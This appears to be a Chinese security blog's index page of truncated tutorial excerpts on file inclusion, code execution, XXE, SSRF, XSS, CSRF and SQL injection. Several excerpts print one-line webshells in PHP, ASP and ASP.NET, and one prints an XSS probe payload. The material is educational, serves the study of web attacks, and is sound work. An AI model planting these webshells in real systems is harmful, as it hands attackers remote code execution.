什么是文件包含
为了防止程序代码冗余,只要使用文件包含处理功能,将所需文件包含进来即可,不必再重复定义它们,从而减少重复劳动和定义不一致造成的错误。
常见的导致文件包含的函数
include()
遇到要包含的文件临时去加载去引用。
当引用的文件发生错误时,系统只会给出个警告错误,而整个php文件会继续执行。
require()
在当前的PHP运行前就先去读取要包含的文件,然后一齐执行。
在php文件被执行之前……继续阅读 »
langsa
3年前 (2022-01-06) 663浏览 0评论
2个赞
什么是代码执行
用户输入的数据会被当做后端代码进行执行。
一句话木马的本质:代码执行漏洞
<?php eval($_REQUEST["chopper"])?>
代码执行与命令执行的区别
代码执行:用户输入的数据被当后端代码执行 (后端代码可以调用系统函数)
eg:var_dump() ,$_SERVER
命令执行:用户输入的数据被当系统命令执行(系统命令也可以写文件产生webs……继续阅读 »
langsa
3年前 (2022-01-04) 645浏览 0评论
2个赞
什么是XXE
概述
XXE:XML External Entity 即XML外部实体。
攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
现况
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
以PHP为例,在PHP里面解析xml用的……继续阅读 »
langsa
3年前 (2021-12-31) 661浏览 0评论
2个赞
0×00 前言
大家好,我是掌控安全学院的聂风,SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。SSRF很多渗透测试人员都知晓,我记忆最深刻的就是白帽大会上面所提及的,虽然SSRF现在被重视了起来,但是还是有很多渗透测试人员,遇到SSRF仅仅就使用HTTP协议看看有没有内网的网站,或者是使用file协议去读取一些本地敏感文件。我这里科普一个gopher协议,看看他能做什么。
0×……继续阅读 »
langsa
3年前 (2021-12-21) 678浏览 0评论
3个赞
一句话木马
PHP:
<?php @eval($_POST['chopper']);?>
ASP:
<%eval request("chopper")%>
ASP.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item["z&q……继续阅读 »
langsa
3年前 (2021-12-07) 625浏览 0评论
3个赞
原理:前端代码注入
条件:
1.用户能够控制输入
2.程序执行的代码拼接了用户输入的数据。
类型
反射型XSS:必须一次性输入所有恶意语句,利用条件苛刻
存储型XSS:持久性,将我们的恶意语句存储起来再触发(存储到了服务器)
DOM型XSS:基于DOM对象的XSS
常见的触发检测方法
利用script弹窗标签 :<script>alert(1)</script> alert(1):利用……继续阅读 »
langsa
3年前 (2021-12-07) 624浏览 0评论
3个赞
Cookie:代表你身份的东西存储在浏览器
同源策略:A网站填充A Cookie
时效性:默认情况下 一次会话(浏览器重启)
XSS:窃取cookie
CSRF:利用cookie
CSRF防御:
1.验证 HTTP Referer 字段;
2.在请求地址中添加 token 并验证;
3.在 HTTP 头中自定义属性并验证。
CSRF漏洞产生的原因:是网站对用户的身份没有进……继续阅读 »
langsa
3年前 (2021-12-07) 631浏览 0评论
3个赞
XSS基础
跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaS……继续阅读 »
langsa
3年前 (2021-12-03) 687浏览 0评论
2个赞
常见数据库参考:
https://blog.csdn.net/gengkui9897/article/details/89294936
数据库语法学习:
https://www.w3school.com.cn/sql/sql_syntax.asp
常见数据库的区别:
https://blog.csdn.net/qq_34193883/article/details/86996995
https://blog.csdn……继续阅读 »
langsa
3年前 (2021-12-03) 613浏览 0评论
2个赞
注入:核心是什么?把输入当作代码,可以是url,可以是表单,还可以是数据包中的任何一个参数
以下皆以以MySQL为例,如有特例会注明。
如果觉得描述的过于简单,会有详述文章供参考。
显错注入
网页页面中在与数据库交互过程中会在特定位置显示数据库中的数据
通过特殊语句来用特定字符来占领显错位,将显错位替换为sql语句,即可得到数据库数据
1.判断是否存在注入
2.判断字段数
3.判断显错位
4.判断库名
5.判断表名
……继续阅读 »
langsa
3年前 (2021-12-03) 582浏览 0评论
2个赞
